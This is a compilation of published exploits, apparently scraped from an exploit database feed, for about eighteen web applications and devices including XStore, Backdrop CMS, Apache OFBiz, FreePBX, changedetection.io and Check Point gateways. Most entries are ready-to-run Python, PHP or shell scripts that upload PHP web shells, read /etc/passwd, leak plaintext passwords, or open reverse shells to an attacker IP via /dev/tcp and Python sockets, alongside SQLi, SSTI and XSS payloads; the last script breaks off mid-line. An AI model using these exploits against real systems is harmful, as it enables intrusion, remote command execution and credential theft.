ISHACK AI BOT

# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Version: 5.3.5 # Tested on: Windows10 # CVE: CVE-2024-33559 Poc <https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc> POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1

# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) # Date: 04/27/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip # Version: latest # Tested on: MacOS import os import time import zipfile def create_files(): info_content = """ type = module name = Block description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 """ shell_info_path = "shell/shell.info" os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur with open(shell_info_path, "w") as file: file.write(info_content) shell_content = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ shell_php_path = "shell/shell.php" with open(shell_php_path, "w") as file: file.write(shell_content) return shell_info_path, shell_php_path def create_zip(info_path, php_path): zip_filename = "shell.zip" with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php') return zip_filename def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + "/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python script.py [url]") else: main(sys.argv[1])

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10 Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall> OR 2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall>

# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)

# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE) # Date: 2024-04-24 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # CVE: CVE-2022-35914 banner(){ echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _" echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |" echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_" echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|" echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|" } while getopts ":u:c:" arg; do case $arg in u) URL=$OPTARG; let parameter_counter+=1 ;; c) CMD=$OPTARG; let parameter_counter+=1 ;; esac done if [ -z "$URL" ] || [ -z "$CMD" ]; then banner echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n" exit else banner echo -e "\n[+] Command output:" fi curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'

Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov (xbz0n) Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. Affected Components Plugin: BWL Advanced FAQ Manager Version: 2.0.3 Affected Parameter: 'date_range' Affected Page: /wp-admin/edit.php Description The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter. Proof of Concept Manual Exploitation The following GET request demonstrates the vulnerability: GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics Connection: close Cookie: [Relevant Cookies] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability. Recommendations BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

# Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS) # Date: 22/5/2024 # Exploit Author: Gabriel Felipe # Vendor Homepage: https://itssglobal.com # Software Link: https://itssglobal.com/index.php/imlog/ # Version: 1.307 # Tested on: Firefox and Chrome Browsers # Patched Version: 1.308 # Category: Web Application # PoC: iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious javascript code on a controlled user so when an admin goes to the "User Maintenance" malicious code is executed and could lead to new admin user creations resulting in privilege escalation. 1. Login to user account 2. Go to Setup > "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>` 5. Click on "Save" 6. Refresh the page, XSS will be triggered.

# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-5-24 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.elkarte.net/ # Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip # Version : 1.1.9 1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m 2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?> 3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)

# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE) # Date: 5-26-2024 # Exploit Author: Zach Crosman (zcrosman) # Vendor Homepage: changedetection.io # Software Link: https://github.com/dgtlmoon/changedetection.io # Version: <= 0.45.20 # Tested on: Linux # CVE : CVE-2024-32651 from pwn import * import requests from bs4 import BeautifulSoup import argparse def start_listener(port): listener = listen(port) print(f"Listening on port {port}...") conn = listener.wait_for_connection() print("Connection received!") context.newline = b'\r\n' # Switch to interactive mode conn.interactive() def add_detection(url, listen_ip, listen_port, notification_url=''): session = requests.Session() # First request to get CSRF token request1_headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = session.get(url, headers=request1_headers) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] print(f'Obtained CSRF token: {csrf_token}') # Second request to submit the form and get the redirect URL add_url = f"{url}/form/add/quickwatch" add_url_headers = { # Define add_url_headers here "Origin": url, "Content-Type": "application/x-www-form-urlencoded" } add_url_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/baseball", "tags": '', "edit_and_watch_submit_button": "Edit > Watch", "processor": "text_json_diff" } post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False) # Extract the URL from the Location header if 'Location' in post_response.headers: redirect_url = post_response.headers['Location'] print(f'Redirect URL: {redirect_url}') else: print('No redirect URL found') return # Third request to add the changedetection url with ssti in notification config save_detection_url = f"{url}{redirect_url}" save_detection_headers = { # Define save_detection_headers here "Referer": redirect_url, "Cookie": f"session={session.cookies.get('session')}" } save_detection_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/all", "title": '', "tags": '', "time_between_check-weeks": '', "time_between_check-days": '', "time_between_check-hours": '', "time_between_check-minutes": '', "time_between_check-seconds": '30', "filter_failure_notification_send": 'y', "fetch_backend": 'system', "webdriver_delay": '', "webdriver_js_execute_code": '', "method": 'GET', "headers": '', "body": '', "notification_urls": notification_url, "notification_title": '', "notification_body": f""" {{% for x in ().__class__.__base__.__subclasses__() %}} {{% if "warning" in x.__name__ %}} {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}} {{% endif %}} {{% endfor %}} """, "notification_format": 'System default', "include_filters": '', "subtractive_selectors": '', "filter_text_added": 'y', "filter_text_replaced": 'y', "filter_text_removed": 'y', "trigger_text": '', "ignore_text": '', "text_should_not_be_present": '', "extract_text": '', "save_button": 'Save' } final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data) print('Final request made.') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Add detection and start listener') parser.add_argument('--url', type=str, required=True, help='Base URL of the target site') parser.add_argument('--port', type=int, help='Port for the listener', default=4444) parser.add_argument('--ip', type=str, required=True, help='IP address for the listener') parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default') args = parser.parse_args() add_detection(args.url, args.ip, args.port, args.notification) start_listener(args.port)

#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability # # # Vendor: Aquatronica s.r.l. # Product web page: https://www.aquatronica.com # Affected version: Firmware: 5.1.6 # Web: 2.0 # # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy # to use, allowing you to control all the electrical devices in # an aquarium and to monitor all their parameters; it can be used # for soft water aquariums, salt water aquariums or both simultaneously. # # Desc: The tcp.php endpoint on the Aquatronica controller is exposed # to unauthenticated attackers over the network. This vulnerability # allows remote attackers to send a POST request which can reveal # sensitive configuration information, including plaintext passwords. # This can lead to unauthorized access and control over the aquarium # controller, compromising its security and potentially allowing attackers # to manipulate its settings. # # Tested on: Apache/2.0.54 (Unix) # PHP/5.4.17 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5824 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php # # # 04.05.2024 # import requests, html, re, sys, time from urllib.parse import unquote program = "TCP" command = "ws_get_network_cfg" function_id = "TCP_XML_REQUEST" print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \. | / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """) if len(sys.argv) != 2: print("Usage: python aqua.py <ip:port>") sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/{program.lower()}.php" post_data = {'function_id' : function_id.lower(), 'command' : command.upper()} r = requests.post(url, data=post_data) if r.status_code == 200: r_d = unquote(r.text) f_d_r = html.unescape(r_d) regex = r'pwd="([^"]+)"' rain = re.findall(regex, f_d_r) for drops in rain: print(' ',drops) time.sleep(0.5) else: print(f"Dry season! {r.status_code}")

# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])

# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 # Tested : https://www.softaculous.com/apps/erp/Akaunting 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab

# Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS) # Date: 2023-12-05 # Exploit Author: Aldi Saputra Wahyudi # Vendor Homepage: https://www.progress.com/sitefinity-cms # Version: < 15.0.0 # Tested on: Windows/Linux # CVE : CVE-2023-27636 # Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor # Steps To Reproduce: Attacker as lower privilege Victim as Higher privilege 1. Login as an Attacker 2. Go to the function using the SF Editor, go to the news page as example 3. Create or Edit news item 4. On the content form, insert the XSS payload as HTML 5. After the payload is inserted, click on the content form (just click) and publish or save 6. If the victim visits the page with XSS payload, XSS will be triggered Payload: <noalert><iframe src="javascript:alert(document.domain);">

# Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Cold z3ro # Date: 6/1/2024 # Tested on: 14,15,16 # Vendor: https://www.freepbx.org/ <?php /// /// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI /// Cod[3]d by Cold z3ro /// $url = "10.10.10.186"; // remote host $backconnectip = "192.168.0.2"; $port = "4444"; $PHPSESSID = "any valid session even extension"; echo "checking $url\n"; $url = trim($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 2); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Referer: http://'.$url.'/admin/config.php?display=api', 'Content-Type: application/x-www-form-urlencoded', ]); curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID); curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); echo $response = curl_exec($ch)."\n"; curl_close($ch); ?>

# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://docs.s9y.org/ # Software Link:https://www.s9y.org/latest # Tested Version: v2.5.0 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response): soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'serendipity[token]'}) return token['value'] if token else None def login(base_url, username, password): print("Logging in...") time.sleep(2) session = requests.Session() login_page = session.get(f"{base_url}/serendipity_admin.php") token = get_csrf_token(login_page) data = { "serendipity[action]": "admin", "serendipity[user]": username, "serendipity[pass]": password, "submit": "Login", "serendipity[token]": token } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{base_url}/serendipity_admin.php" } response = session.post(f"{base_url}/serendipity_admin.php", data=data, headers=headers) if "Add media" in response.text: print("Login Successful!") time.sleep(2) return session else: print("Login Failed!") return None def upload_file(session, base_url, filename, token): print("Shell Preparing...") time.sleep(2) boundary = "---------------------------395233558031804950903737832368" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Referer": f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media" } payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" f"{token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" f"admin\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" f"media\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" f"add\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"{filename}\"\r\n" f"Content-Type: text/html\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) response = session.post(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media", headers=headers, data=payload.encode('utf-8')) if f"File {filename} successfully uploaded as" in response.text: print(f"Your shell is ready: {base_url}/uploads/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: token = get_csrf_token(session.get(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media")) upload_file(session, base_url, filename, token) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: main(sys.argv[1], sys.argv[2], sys.argv[3])

# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://git.dotclear.org/explore/repos # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip # Tested Version: v2.29 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response_text): soup = BeautifulSoup(response_text, 'html.parser') token = soup.find('input', {'name': 'xd_check'}) return token['value'] if token else None def login(base_url, username, password): print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) session = requests.Session() login_data = { "user_id": username, "user_pwd": password } login_url = f"{base_url}/admin/index.php?process=Auth" login_response = session.post(login_url, data=login_data) if "Logout" in login_response.text: print("Login Successful!") return session else: print("Login Failed!") return None def upload_file(session, base_url, filename): print("Shell Preparing...") time.sleep(1) boundary = "---------------------------376201441124932790524235275389" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "X-Requested-With": "XMLHttpRequest" } csrf_token = get_csrf_token(session.get(f"{base_url} /admin/index.php?process=Media").text) payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n" f"2097152\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n" f"{csrf_token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename} \"\r\n" f"Content-Type: image/jpeg\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) upload_response = session.post(f"{base_url} /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0", headers=headers, data=payload.encode('utf-8')) if upload_response.status_code == 200: print(f"Your Shell is Ready: {base_url}/public/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: upload_file(session, base_url, filename) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main(base_url, username, password)

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE) # Date: 05.05.2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: MacOS import requests import random import string import time import re import sys if len(sys.argv) < 4: print("Usage: python3 script.py <url> <username> <password>") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() login_url = f'{base_url}/admin/index.php?id=dashboard' login_data = { 'login': username, 'password': password, 'login_submit': 'Log+In' } filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k= 5)) print("Logging in...") response = session.post(login_url, data=login_data) if 'Dashboard' in response.text: print("Login successful") else: print("Login failed") exit() time.sleep(3) edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk' response = session.get(edit_url) # CSRF token bulmak için edit sayfasına erişim token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value=" (.*?)"', response.text) if token_search: token = token_search.group(1) else: print("CSRF token could not be found.") exit() content = ''' <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ''' edit_data = { 'csrf': token, 'name': filename, 'content': content, 'add_file': 'Save' } print("Preparing shell...") response = session.post(edit_url, data=edit_data) time.sleep(3) if response.status_code == 200: print(f"Your shell is ready: {base_url}/public/themes/default/{filename} .chunk.php") else: print("Failed to prepare shell.")

# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE) # Date: 3/5/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip # Version: 1.6.2 # Tested on: MacOS import requests from bs4 import BeautifulSoup import sys import time def login(url, username, password): print("Logging in...") time.sleep(3) with requests.Session() as session: response = session.get(url + "/admin/login/index.php") soup = BeautifulSoup(response.text, 'html.parser') form = soup.find('form', attrs={'name': 'login'}) form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'} # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password post_response = session.post(url + "/admin/login/index.php", data=form_data) if "Administration" in post_response.text: print("Login successful!") time.sleep(3) return session else: print("Login failed.") print("Headers received:", post_response.headers) print("Response content:", post_response.text[:500]) # İlk 500 karakter return None def upload_file(session, url): # Dosya içeriğini ve adını belirleyin print("Shell preparing...") time.sleep(3) files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')} data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' } response = session.post(url + 